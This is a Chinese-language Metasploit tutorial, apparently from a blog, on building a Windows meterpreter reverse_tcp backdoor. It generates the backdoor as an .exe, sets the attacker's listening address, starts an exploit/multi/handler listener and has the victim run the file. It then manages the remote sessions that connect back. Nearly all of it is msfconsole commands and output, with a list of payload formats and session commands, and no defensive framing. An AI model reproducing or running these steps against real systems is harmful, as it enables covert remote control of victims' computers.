一、后门生成
1.1 调用payload
msf > use payload/windows/meterpreter/reverse_tcp
1.2 使用show option 命令查看需要配置选项:
msf payload(reverse_tcp) > show options
Module options (payload/windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
1.3 配置payload选项(此地的LHOST为***者的IP地址)
msf payload(reverse_tcp) > set LHOST 172.16.0.102
LHOST => 172.16.0.102
msf payload(reverse_tcp) > show options
Module options (payload/windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.0.102 yes The listen address
LPORT 4444 yes The listen port
1.4 生成后门文件(-t 后制定后门文件的类型,本例为exe ; -f 制定文件路径和文件名)
msf payload(reverse_tcp) > generate -t exe -f /Users/jiangzhehao/Downloads/4.exe
[*] Writing 73802 bytes to /Users/jiangzhehao/Downloads/4.exe...
二、配置漏洞利用端
2.1 配置exploit/multi/handler作为利用端
msf > use exploit/multi/handler
2.2 选择前边生成后门对应的payload
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
2.3 配置选项中需要的监听地址和端口
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LHOST 172.16.0.102
LHOST => 172.16.0.102
2.4 配置完成后使用exploit命令开始监听
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 172.16.0.102:4444
[*] Starting the payload handler...
三、将生成的后门发送给客户端执行
四、在监听下的命令行等待客户端上线,上线后会出现如下提示:
[*] Sending stage (957999 bytes) to 172.16.0.102
[*] Meterpreter session 1 opened (172.16.0.102:4444 -> 172.16.0.102:53175) at 2016-05-08 20:12:37 +0800
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.231.128 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) >
(一旦服务端退出,客户端也会随即退出)
附:
1、生成的后门可以支持多种格式,具体如下:
bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,psh-cmd,vba,vba-exe,vba-psh,vbs,war
2、返回的连接可以使用background 将当前连接切换到后台运行;
3、切换到后台的会话可以使用session -i查看到,然后使用session -i id 将后台的会话切换回前台;
4、切换到后台的会话可以使用session -i查看到,还可以使用session -k id 将后台指定会话中断;